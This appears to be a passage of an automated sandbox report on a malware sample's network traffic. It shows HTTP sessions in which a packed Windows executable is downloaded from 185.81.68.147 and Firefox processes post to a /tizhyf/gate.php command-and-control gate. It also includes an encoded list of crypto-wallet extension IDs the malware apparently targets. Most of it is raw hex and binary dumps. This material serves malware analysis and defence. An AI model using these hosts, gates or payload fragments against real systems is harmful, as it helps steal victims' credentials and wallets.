                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308448076 CET1236INData Raw: fc 82 ca a6 e0 90 d0 b0 33 a7 d8 15 f1 04 98 4a 41 ec da f7 7f cd 50 0e 17 91 f6 2f 76 4d d6 8d 43 ef b0 4d cc aa 4d 54 e4 96 04 df 9e d1 b5 e3 4c 6a 88 1b c1 2c 1f b8 46 65 51 7f 9d 5e ea 04 01 8c 35 5d fa 87 74 73 fb 0b 41 2e b3 67 1d 5a 92 db
                                                                                                                                                                                                                                                                                        Data Ascii: 3JAP/vMCMMTLj,FeQ^5]tsA.gZRV3mGa7zY<'a5zG<YUs?ys7S_[=oxDh>8$4,@_r%(<IA9qdV{a2pHl\tWB/SolutionC
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308594942 CET108INData Raw: ce 49 87 ce 55 ff aa 55 28 78 50 28 df 7a a5 df 8c 8f 03 8c a1 f8 59 a1 89 80 09 89 0d 17 1a 0d bf da 65 bf e6 31 d7 e6 42 c6 84 42 68 b8 d0 68 41 c3 82 41 99 b0 29 99 2d 77 5a 2d 0f 11 1e 0f b0 cb 7b b0 54 fc a8 54 bb d6 6d bb 16 3a 2c 16 50 00
                                                                                                                                                                                                                                                                                        Data Ascii: IUU(xP(zYe1BBhhAA)-wZ-{TTm:,Profile_FsbGV0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308607101 CET1236INData Raw: 43 00 6d 00 5a 00 75 00 61 00 6d 00 68 00 74 00 61 00 32 00 68 00 6f 00 62 00 57 00 74 00 69 00 61 00 6d 00 74 00 72 00 59 00 57 00 4a 00 75 00 5a 00 47 00 4e 00 75 00 62 00 6d 00 39 00 6e 00 59 00 57 00 64 00 76 00 5a 00 32 00 4a 00 75 00 5a 00
                                                                                                                                                                                                                                                                                        Data Ascii: CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV0CmFpaWZibmJmb2JwbWVla2lwaGVlaWppbWRwbmxwZ3BwfFRlcnJhU3RhdGlvbg
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308619022 CET1236INData Raw: 68 00 75 00 5a 00 57 00 64 00 70 00 62 00 57 00 35 00 38 00 54 00 47 00 6c 00 78 00 64 00 57 00 46 00 73 00 61 00 58 00 52 00 35 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 68 00 74 00 5a 00 57 00 39 00 69 00 62 00 6d 00 5a 00
                                                                                                                                                                                                                                                                                        Data Ascii: huZWdpbW58TGlxdWFsaXR5V2FsbGV0CmhtZW9ibmZuZmNtZGtkY21sYmxnYWdtZnBmYm9pZWFmfFhkZWZpV2FsbGV0CmxwZmNiamtuaWpwZWVpbGxpZm5raWtn
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.428169966 CET1236INData Raw: 46 00 6e 00 62 00 57 00 5a 00 77 00 5a 00 6d 00 4a 00 76 00 61 00 57 00 56 00 68 00 5a 00 6e 00 78 00 59 00 5a 00 47 00 56 00 6d 00 61 00 56 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 73 00 63 00 47 00 5a 00 6a 00 59 00 6d 00 70 00
                                                                                                                                                                                                                                                                                        Data Ascii: FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdm


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        20192.168.2.1049983185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:54.636282921 CET232OUTGET /vvv.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.964843035 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:55 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 05:59:50 GMT
                                                                                                                                                                                                                                                                                        ETag: "2e9600-6290c6c1b377a"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 3053056
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 f6 8e 00 00 00 00 00 f0 00 22 00 0b 02 03 00 00 a0 2e 00 00 10 00 00 00 70 66 00 30 04 95 00 00 80 66 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 30 95 00 00 02 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 95 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 c0 91 00 54 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd".pf0f@0` TUPX0pfUPX1.f.@UPX2 .@4.24UPX!$V9uv%.I5<Pm|EB2@^1sMwG3BTIX`("U{"7Ne(=((sWDd;{Os/0&p`PNwS%2S?87x+vJt(>./zosczy,v$j]MRdh1a}}h-=U4}yQ:GQ2]0[^=K?/>SZ9pvuwOnm%Euq^n <gCOUQBZ<x%THnb<oS
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.964911938 CET1236INData Raw: ff cd f3 68 2e 2c b3 78 64 6e d2 44 26 56 72 6c cd 17 fe f5 da 8a de 9b 23 04 72 c6 b9 8a 38 12 e6 45 01 fa 74 97 2b 0a 7d 65 97 6b 0c 8e d1 d1 47 fe 49 ec fb b2 6f 3a a1 6f 52 15 bf 77 f8 cf 97 3f 4a d5 f1 6e 97 81 bb bc bb f4 67 c4 c4 59 2a 59
                                                                                                                                                                                                                                                                                        Data Ascii: h.,xdnD&Vrl#r8Et+}ekGIo:oRw?JngY*YT%tfXkM\(.r!zR_|<xL=x:8Tu2#cOS8*6q2Ll, yK(^zgx<)W.=Y^1G
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.964917898 CET448INData Raw: 3e 3e fd ca cc 06 71 de b3 b0 65 a5 ab af 34 b4 6e f5 9e 64 ef 71 ec 17 09 70 36 cb af 09 9a 56 0a 07 a4 96 5e b3 3a 0b 96 ab c4 0e dd cb 21 fd 81 16 b2 ae cc d7 91 14 28 37 64 cf 78 bc ff 4f 5b 66 eb e1 3c d2 0e 7f 07 8c 3f 6a 97 6b 79 fb cd 66
                                                                                                                                                                                                                                                                                        Data Ascii: >>qe4ndqp6V^:!(7dxO[f<?jkyf&>,122vCqsq{N{3XTK(TgJv97bQ<wi}V+o$_W81[NI=?YANJA{|ugR
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965085030 CET1236INData Raw: e6 24 14 37 a3 7d 0f 47 19 86 5d df 02 ce 9b 9d 1e ba bb 40 90 8e 4f bd 7d f3 0d ee dd ca c0 7c 0f 5e b2 0d 57 0c d4 78 a3 b8 76 8f 7a 75 d0 1f d4 09 53 b5 7b de 98 61 4d dd 37 df cb fe fc a6 f9 19 11 b7 0c ca d2 44 85 22 ab 5c 16 3a 87 71 b3 e8
                                                                                                                                                                                                                                                                                        Data Ascii: $7}G]@O}|^WxvzuS{aM7D"\:q`2ct-lYiay|3h T[jGHmH+mkV(Ls7"l'LrIpJ*9;9(_&A#
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965090990 CET1236INData Raw: 59 88 8e 4d 9f 2f 5e dc b2 5f ff 57 33 de ba 1d b4 f1 2c d7 1d b9 a4 49 48 0e 5f 86 67 ec 2f 44 27 b2 9e b7 0f e7 7d 50 aa d6 f1 56 45 30 0f b8 05 45 5e ef fa 83 ad cc 59 56 92 ab bd 0e 86 27 71 6d ac b9 da 81 d6 31 d5 52 88 6b b9 c0 39 ce 8f 80
                                                                                                                                                                                                                                                                                        Data Ascii: YM/^_W3,IH_g/D'}PVE0E^YV'qm1Rk9(oEU%6GE+k!Or(R<!|E4=8C;~ZLhk{,u=mS8G4$7|wK/ELs/f.KP'$wbk$)
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965096951 CET1236INData Raw: 11 a8 82 df 97 7c 0c 6f 86 12 14 3b 1f f4 29 46 6c c2 d9 48 b4 49 4b 98 72 20 dc 45 19 c0 60 19 bf 0c 58 93 86 f7 7e 34 f7 e1 cc 26 21 e9 8e 7a 5f 01 3c fc e7 49 1a 46 c7 ac 58 db 40 88 2b 69 bd eb 41 8d ea 24 25 93 27 de e0 b1 2b cc 5d 86 bf 4a
                                                                                                                                                                                                                                                                                        Data Ascii: |o;)FlHIKr E`X~4&!z_<IFX@+iA$%'+]J0m@MK2&R<j\vQb{1M^3Yh=xSE/?$AmX5mS=,`l}6~0n}T*5uGXYt
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965107918 CET1236INData Raw: a9 8d 03 2e 61 7a 19 9e 1d c8 22 5e 17 c4 0a 85 d0 c6 d7 57 d2 3f 56 6e 02 a2 77 6f 90 0a 89 83 9d ef 36 02 f2 f3 73 82 6f 53 57 7e 8d 26 a2 d6 e8 92 fc c7 1c d8 b0 bb 22 f0 97 f1 bb ec 22 54 0d 69 1d 02 d7 4d f7 23 81 a0 86 82 77 25 05 d3 ed fc
                                                                                                                                                                                                                                                                                        Data Ascii: .az"^W?Vnwo6soSW~&""TiM#w%S"`bvnIwOz_\*+1Lb/FJ&-kLt2eHea^rKe(K'>692A8cwywo8ICD W>~?:hGVSH:CsZ-8CC-]
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965244055 CET1236INData Raw: 97 c8 91 cf 4b e7 bb 68 7d d8 9b ea 46 9e f6 28 0f 99 d4 26 ee 21 27 ea 46 f0 7a 16 8e 8d 84 42 2d dd 9e c3 b7 b2 fb 3f 14 28 74 40 49 0b 93 95 78 ee 32 e1 00 95 a1 12 d1 0b 1a f4 2b c2 7b ee 08 d6 93 7a a0 90 90 01 b6 45 a0 44 35 d0 76 20 fb 92
                                                                                                                                                                                                                                                                                        Data Ascii: Kh}F(&!'FzB-?(t@Ix2+{zED5v [EcpnFv7h+^~EP'2JeG/e'(k~#%*4J-_lfoD(U?q93)ncE~
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965289116 CET1236INData Raw: 36 9f 13 eb 78 54 82 4d 56 54 71 87 88 bf fb 9e 1b 91 3a e0 f0 dc 55 4d 3b c1 d2 87 8d 88 81 07 4e 33 e8 53 3a a2 93 ea 01 68 4a c4 eb 81 13 2f 97 23 35 0d 03 0c c4 dc 0f 46 b4 3f c2 a8 1f 5e 29 dd 25 d8 4e 0d 5d 6f 3f aa b8 07 26 cf 7f 03 8e 09
                                                                                                                                                                                                                                                                                        Data Ascii: 6xTMVTq:UM;N3S:hJ/#5F?^)%N]o?&2M7}%qQR%XZ,BD+/HA1HQ[4C2_325(=LAQ4AQ}vY#>3Nr3B=8l^qnZRB[l
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:55.965296030 CET1236INData Raw: d0 e6 9f 4d fe 3c cd 3c e8 36 b0 d0 e4 91 17 bf 59 d3 87 08 b1 57 9b 1a b0 df b7 ea a4 61 1e ae ac bc a7 96 dd 02 71 94 a9 f4 c4 c7 2c 0a 6e c3 fa 82 55 a1 f6 ca 76 f5 c9 3a 5b 16 94 0c 0c 41 17 74 02 05 4b 4a f8 50 ff 11 99 08 c6 83 68 29 bb 89
                                                                                                                                                                                                                                                                                        Data Ascii: M<<6YWaq,nUv:[AtKJPh)T.tP-n4~+l[+SMvv?~[l3dTH#?-]KZ:Nk!N4`',|kI\suzL9o~>ANgA"m2z5IB{D`h4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:56.085046053 CET1236INData Raw: b0 77 7d 25 0a 01 50 f0 c7 d6 ab ea 4f 7b 39 9b 93 82 b3 d6 cf 90 52 39 77 0d 15 2d 82 ea 92 23 68 50 0e 90 56 03 21 91 21 2c f5 6b a4 1b 8e 4b c0 fd 0f 0b 29 01 69 66 40 7e ea 56 a1 66 d7 0b cc 65 9a ea 5b 87 ef c4 0d 48 28 17 cc c6 6b 04 19 ab
                                                                                                                                                                                                                                                                                        Data Ascii: w}%PO{9R9w-#hPV!!,kK)if@~Vfe[H(k_;YMNDKmU~e6[jdumS|<#upmX7O( )z!/o8bUl}E}zAtNN_&_C{j]pY r ["/


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        21192.168.2.1049989185.81.68.147805632C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:56.475855112 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:57.804702997 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:57 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        22192.168.2.1049996185.81.68.147805632C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:57.933981895 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:58.053827047 CET10OUTData Raw: 72 57 42 2b 57 5a 5c 55 43 12
                                                                                                                                                                                                                                                                                        Data Ascii: rWB+WZ\UC
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.570924997 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:58 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.570950031 CET1236INData Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05
                                                                                                                                                                                                                                                                                        Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT:FF^NT^mFSnBXEMY
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.570961952 CET448INData Raw: 03 06 3e 1b 10 58 43 43 0e 57 0d 54 40 4a 04 6a 16 6c 17 14 05 47 44 0d 54 59 17 44 03 57 12 08 6b 16 5e 05 57 38 40 15 5b 52 5f 65 12 5a 57 45 05 6e 0c 42 58 65 1b 16 57 5c 54 47 17 0f 6c 40 51 59 17 5b 4b 57 09 5b 43 46 5e 0f 11 0a 17 58 57 44
                                                                                                                                                                                                                                                                                        Data Ascii: >XCCWT@JjlGDTYDWk^W8@[R_eZWEnBXeW\TGl@QY[KW[CF^XWDZlEVYL\FUTW[FjGPF^Pe]TF_LUe]]UPUP[BhFWHhRBhDEBTnV^__POPGP]SZD\RQQ^YAV[]TE8@BCIWYARVFJj\TV^o^SR:XqV@TCUCMB_
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571131945 CET1236INData Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58
                                                                                                                                                                                                                                                                                        Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571204901 CET1236INData Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c
                                                                                                                                                                                                                                                                                        Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571216106 CET1236INData Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16
                                                                                                                                                                                                                                                                                        Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571355104 CET1236INData Raw: 6d 38 00 05 4a 6d 03 14 56 78 1b 71 51 1c 5b 6a 4e 0d 09 4b 68 6c 57 1b 03 12 6d 59 17 55 0a 58 15 40 46 59 43 57 63 06 56 01 1a 50 41 16 5f 19 6b 19 19 6b 3d 53 4a 7b 49 74 45 5a 40 53 04 1d 3f 53 1d 18 76 1b 2d 7c 4b 7a 36 18 6d 04 1c 5a 6c 1f
                                                                                                                                                                                                                                                                                        Data Ascii: m8JmVxqQ[jNKhlWmYUX@FYCWcVPA_kk=SJ{ItEZ@S?Sv-|Kz6mZlP[DleT?ZVXGD@JbPSS[l?mJaNBKbQLvLy({ilikj;P^D[FLUKOd]TAVKwX\NLQYsWRX^DWZLZXPZS/^RF_YFuTW^SSEX^RK_
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571367025 CET1236INData Raw: 17 14 11 43 11 44 42 15 12 16 42 19 12 5d 57 43 00 6e 00 52 53 56 4b 53 16 0a 15 16 58 1d 44 0b 43 5a 00 08 44 18 6b 3f 17 14 11 43 11 44 42 15 12 16 42 19 12 50 58 5d 04 52 16 15 0f 19 1b 0a 47 53 47 5d 14 46 0e 04 42 58 06 42 0f 5b 08 15 45 51
                                                                                                                                                                                                                                                                                        Data Ascii: CDBB]WCnRSVKSXDCZDk?CDBBPX]RGSG]FBXB[EQAPt^Z#]TKSDT[\NwPTGQAU[FCSR6RWNJlA>kWbmnUIY]OMwH~,(enN9QMjkejVVL98=UKOvy)*2hOmBM[JeeTWi_SYE@gRST
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571377039 CET1120INData Raw: 3f 50 50 03 00 61 69 04 4b 00 36 06 5a 05 33 74 07 73 4f 45 07 02 54 10 19 19 4d 44 4c 0a 15 13 30 70 5d 01 65 4f 5d 74 51 06 11 40 62 60 7f 55 70 2f 27 64 00 7e 16 6a 5b 0d 0e 50 0f 04 10 5f 45 7b 1e 16 49 0b 15 47 01 46 79 0c 43 53 17 40 07 58
                                                                                                                                                                                                                                                                                        Data Ascii: ?PPaiK6Z3tsOETMDL0p]eO]tQ@b`Up/'d~j[P_E{IGFyCS@XN]E^W\qUZvURFJ\E^PC%VTRESJ_G[F4<ABH9nBkh<FIJ8=9;CJihBEKZ[@DAXRSSZYF=hEDDA_CN@?<B@S=TZWMSZDDi=hEFF
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.571491957 CET1236INData Raw: 03 1a 12 50 4f 40 72 0c 5f 10 07 5b 46 16 5f 19 5e 56 52 52 4f 45 07 4f 41 7a 56 58 40 55 5b 40 4a 40 55 12 5b 57 06 53 4e 46 03 52 52 4c 1d 43 5f 01 15 74 56 52 10 5c 43 4a 53 44 4f 45 10 4f 1c 02 19 4b 1d 0b 15 49 44 4f 19 59 17 5f 03 16 4e 51
                                                                                                                                                                                                                                                                                        Data Ascii: PO@r_[F_^VRROEOAzVX@U[@J@U[WSNFRRLC_tVR\CJSDOEOKIDOY_NQTXPB(FFBB\Z]DFuPE@S[wQ_ZG{VYTCZBN_ZZVB,VX\B[|ZC@sDSMH]V[AUBLED@U]UAJBRYZZUCFxADLESYQNV[UBPBDDALBJKSZZFRA$RF


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        23192.168.2.1049998185.81.68.14780504C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:59.210993052 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:00.539519072 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:59 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
